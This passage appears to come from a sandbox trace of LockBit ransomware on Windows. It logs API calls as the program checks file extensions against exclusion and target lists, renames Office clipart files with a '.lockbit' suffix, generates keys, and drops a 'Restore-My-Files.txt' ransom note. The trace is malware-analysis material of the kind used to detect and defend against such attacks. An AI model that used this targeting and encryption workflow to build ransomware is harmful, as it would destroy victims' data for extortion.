lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.297] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.297] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD08808_.WMF") returned 1 [0106.298] lstrcmpiW (lpString1="ntldr", lpString2="BD08808_.WMF") returned 1 [0106.298] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD08808_.WMF") returned 1 [0106.298] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD08808_.WMF") returned 1 [0106.298] lstrcmpiW (lpString1="autorun.inf", lpString2="BD08808_.WMF") returned -1 [0106.298] lstrcmpiW (lpString1="thumbs.db", lpString2="BD08808_.WMF") returned 1 [0106.298] lstrcmpiW (lpString1="iconcache.db", lpString2="BD08808_.WMF") returned 1 [0106.298] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.298] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned=".WMF" [0106.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.298] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.298] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.299] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.299] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.lockbit") returned 72 [0106.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.300] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.300] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.300] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=47996) returned 1 [0106.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.301] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.307] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.307] malloc (_Size=0xa6) returned 0x77d800 [0106.307] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.310] free (_Block=0x77d800) [0106.310] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.311] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.311] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD08868_.WMF", cAlternateFileName="")) returned 1 [0106.311] lstrcmpiW (lpString1=".", lpString2="BD08868_.WMF") returned -1 [0106.311] lstrcmpiW (lpString1="..", lpString2="BD08868_.WMF") returned -1 [0106.311] PathFindExtensionW (pszPath="BD08868_.WMF") returned=".WMF" [0106.311] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.311] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.312] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.312] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD08868_.WMF") returned 1 [0106.313] lstrcmpiW (lpString1="ntldr", lpString2="BD08868_.WMF") returned 1 [0106.313] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD08868_.WMF") returned 1 [0106.313] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD08868_.WMF") returned 1 [0106.313] lstrcmpiW (lpString1="autorun.inf", lpString2="BD08868_.WMF") returned -1 [0106.313] lstrcmpiW (lpString1="thumbs.db", lpString2="BD08868_.WMF") returned 1 [0106.313] lstrcmpiW (lpString1="iconcache.db", lpString2="BD08868_.WMF") returned 1 [0106.313] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.313] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned=".WMF" [0106.313] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.313] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.313] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.314] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.314] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.lockbit") returned 72 [0106.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.315] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.315] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.315] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=40206) returned 1 [0106.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.316] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.321] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.321] malloc (_Size=0xa6) returned 0x77d800 [0106.321] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.323] free (_Block=0x77d800) [0106.323] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.323] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.324] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD09031_.WMF", cAlternateFileName="")) returned 1 [0106.324] lstrcmpiW (lpString1=".", lpString2="BD09031_.WMF") returned -1 [0106.324] lstrcmpiW (lpString1="..", lpString2="BD09031_.WMF") returned -1 [0106.324] PathFindExtensionW (pszPath="BD09031_.WMF") returned=".WMF" [0106.324] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.324] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.325] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.325] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD09031_.WMF") returned 1 [0106.325] lstrcmpiW (lpString1="ntldr", lpString2="BD09031_.WMF") returned 1 [0106.325] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD09031_.WMF") returned 1 [0106.325] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD09031_.WMF") returned 1 [0106.325] lstrcmpiW (lpString1="autorun.inf", lpString2="BD09031_.WMF") returned -1 [0106.325] lstrcmpiW (lpString1="thumbs.db", lpString2="BD09031_.WMF") returned 1 [0106.326] lstrcmpiW (lpString1="iconcache.db", lpString2="BD09031_.WMF") returned 1 [0106.326] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned=".WMF" [0106.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.326] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.326] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.327] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.327] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.327] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.lockbit") returned 72 [0106.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.327] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.327] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.327] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=47786) returned 1 [0106.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.328] 